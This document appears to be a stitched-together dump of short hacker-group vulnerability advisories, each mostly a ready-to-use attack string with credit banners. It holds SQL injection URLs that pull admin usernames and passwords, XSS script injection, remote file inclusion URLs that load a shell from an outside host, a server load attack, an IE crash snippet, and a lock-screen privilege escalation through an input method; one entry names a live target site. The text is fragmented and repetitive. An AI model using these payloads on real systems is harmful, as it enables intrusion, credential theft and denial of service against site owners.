Vulnerability: a small IE address bar character-conversion feature
In my IE 8, the address bar automatically transforms a "\" (0x5c) entered in the URL into "/" (0x2f).
Example: www.securitylab.ir \a is converted to www.securitylab.ir/a
I recently found that some phishing sites take advantage of this feature to bypass some security checks, so it is noted here.
#################################################################
# Discovered By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & whh_iran[AT]yahoo.com
###################################################################
# Risk: Medium
#################################################################
Vulnerability:
http://site.com/index.php?option=com_weblinks&task=view&catid=8&id=-1 UNION SELECT 1,2,3,4,5
#################################################################
# Discovered By: Pouya Daneshmand
# Website: http://Pouya.securitylab.ir
# Contacts: admin[at]securitylab.ir & whh_iran[AT]yahoo.com
###################################################################
Vulnerability:
# http://[HOST]/?modul=niusy&id=61[Sqli]
Credit:
# Discovered By: MG
# Website: http://Ariko-security.com
Ariko-Security
vuln@ariko-security.com
http://site.com/?fa=<SCRIPT/SRC="http://site.com/xss.js"></SCRIPT>
#################################################################
Live Test: http://www.bkd-bandungkab.com
#################################################################
# Discovered By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: info[at]securitylab.ir & whh_iran[at]yahoo.com
###################################################################
http://[site]/js/enter.php?cid=7546[SQLi]&skin=&survey=&survey_ec=&survey_lm=&group=On-Duty+Techs
Credit:
# Discovered By: MG
# Website: http://Ariko-security.com
# Contacts: support[-at-]ariko-security.com
Ariko-Security
# Risk: Medium
#################################################################
Vulnerability:
http://site.ir/products_list_fa.asp?id=-1001+UNION+ALL+SELECT+1,2,3,4,5,6,7,username,password,10,11,12,13+Form+admin
#################################################################
# Discovered By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & whh_iran[AT]yahoo.com
###################################################################
Vulnerability:
# http://www.[site]/index.php?page=1322[SQLi]&lang=eng&cnt=services
Credit:
# Discovered By: MG
# Website: http://Ariko-security.com
Advisory:
#http://www.ariko-security.com/feb2010/ad453.html
# Contacts: support[-at-]ariko-security.com
www.virangar.org
www.virangar.net
--------
Discovered By : hadihadi
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
& all virangar members & all iranian hackerz
www.virangar.org
www.virangar.net
--------
Discovered By :virangar security team(hadihadi)
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
& all virangar members & all hackerz
www.virangar.org
www.virangar.net
--------
Discovered By : virangar security team
(hadihadi)
---------------------------------
special tnx to:MR.nosrati,black.shadowes,MR.hesy,satan,Zahra
& all virangar members & all hackerz
www.virangar.org
www.virangar.net
--------
Discovered By :hadihadi
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
& all virangar members & all hackerz
www.virangar.org
www.virangar.net
--------
Discovered By : virangar security team(hadihadi)
---------------------------------
special tnx to:MR.nosrati,MR.hesy,satan,Zahra
& my lovely friend arash from empror team
& all virangar members & all hackerz
www.virangar.org
www.virangar.net
--------
Discovered By :virangar security team(hadihadi)
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
& all virangar members & all hackerz
www.virangar.org
www.virangar.net
--------
Discovered By : virangar security team
(hadihadi & black.shadowes)
---------------------------------
special tnx to:MR.nosrati,MR.hesy,satan,Zahra
& all virangar members & all iranian hackerz
#--------------------------------
#
#http://sitename.com/forum/forumreply.php?chemin=http://SHELLURL?
#
#================================================================================================
#Discovered By :Darkdewil[system-errrror]
#
#Contact : system-errrror[at]hotmail[dot]com
#
#Thx To :Cazanova & fedaiturk & n3twork & codes & Sevecen
#
#--------------------------------
#
#http://sitename.com/path/includes/class/class_tpl.php?cache_file=http://SHELLURL?
#
#================================================================================================
#Discovered By :Darkdewil[system-errrror]
#
#Contact : system-errrror[at]hotmail[dot]com
#
#Thx To :Cazanova & fedaiturk & n3twork & codes & Sevecen
#
++
++ http://sitename.com/SPIP-v1-7-2/inc-calcul.php3?squelette_cache=http://SHELLURL?
++
++==================================================================================
++
+++++++++++++++++++++|Discovered By :Darkdewil[system-errrror]|+++++++++++++++++++++
++ ++
++++++++++++++++++|Contact : system-errrror[at]hotmail[dot]com |++++++++++++++++++++
++ ++
++++++++++++|Thx To :Cazanova & fedaiturk & n3twork & codes & by_Ka0s |+++++++++++++
++ ++
*********************************************************************
******************* |The construction In the level |*****************
*********************************************************************
************************| Prepare by D@rkDewil |*********************
*********************************************************************
*************|Discovered By :Darkdewil[system-errrror]|**************
************ *************
***********|Contact : system-errrror[at]hotmail[dot]com |***********
********* *********
*********************************************************************
======>Thx To :Cazanova & fedaiturk & n3twork & codes & Sevecen<=====
http://site.ir/Portal/Picture/ShowObjectPicture.aspx?Width=%27910000&Height=1099000-=&ObjectType=News&ObjectID=(Picture ID)
Setting large values for width and height makes it possible to create
a large load on the server.
#################################################################
# Discovered By: Pouya Daneshmand
# Website: http://Securitylab.ir
# Contacts: info[at]securitylab.ir & whh_iran[at]yahoo.com
###################################################################
# SQL Injection:
######################
http://site.ir//Modules/Administrative/ShowPhotos/ShowImages.aspx?FieldName=Content_Image1&h=75&id=%24[SQL Injection]&w=75
#################################################################
# Discovered By: Securitylab.ir
# Website: http://Securitylab.ir
# Contacts: info[at]securitylab.ir
###################################################################
# Risk: Medium
#################################################################
Vulnerability:
http://site.com/index.php?option=com_xmap&sitemap=2&Itemid=18-1 UNION SELECT 1,2,3,version(),5,6,7,8--
#################################################################
# Discovered By: Pouya Daneshmand
# Website: http://Pouya.securitylab.ir
# Contacts: admin[at]securitylab.ir & whh_iran[AT]yahoo.com
###################################################################
# Vulnerability:
# <object id=TestObj classid="CLSID:{432F118C-DB79-4561-9799-CC95EA78208B}" style="width:100;height:350"></object>
###################################################################
# Tested on XpSP2 IE6/7
###################################################################
# Discovered By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
###################################################################
Vulnerability Process Description:
When the Sogou input method is loaded with Windows (after signing on to the system),
lock the computer (Ctrl+Alt+Del), switch to the Sogou input method, and enter letters so that the Sogou Pinyin input method toolbar appears. Clicking search then calls iexplorer.exe.
From the IE address bar you can then open the system32 directory directly and run cmd. If the login account is in the administrators group, this gives direct access to local system privileges.
###################################################################
# Discovered By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: k4mr4n_st@yahoo.com
###################################################################
# Risk: High
#################################################################
# Vulnerability:
# http://site.com/admin/fckeditor/editor/filemanager/connectors/asp/connector.asp
#################################################################
# Discovered By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: info[at]securitylab.ir & whh_iran@yahoo(dot)com
###################################################################
Vulnerability:
IE.html
<script>document.createElement("html").outerHTML</script>
#################################################################
# Discovered By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: info[at]securitylab.ir & whh_iran@yahoo.com
###################################################################
#
#http://sitename.com/[Script Path]/index.php?mosConfig_absolute_path=http//www.shellurl.com.com
#
#
#================================================================================================
#Discovered By : Fegla
#
#Contact : alex_zooz_zooz[at]hotmail.com
#
#GreetZ : Sub-Code ,ShikaA , Wizard CC
> Vulnerability:
>
> IE.html
> <script>document.createElement("html").outerHTML</script>
> #################################################################
> # Discovered By: Pouya Daneshmand
> # Website: http://securitylab.ir
> # Contacts: info[at]securitylab.ir & whh_iran@yahoo.com
> ###################################################################
########################## Securitylab.ir ########################
# Application Info:
# Name: EEGshop
# Version: 1.2
#################################################################
# Discovered By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: info@securitylab[dot]ir , secu_lab_ir@yahoo.com
#################################################################
#===========================================================
# http://site.com/User/shhr_inc.asp?action=edit&id=24%20and%201=2%20union%20select%201,2,username,password,5,6,7,8,9%20from%20eeg_admin%20where%20id=1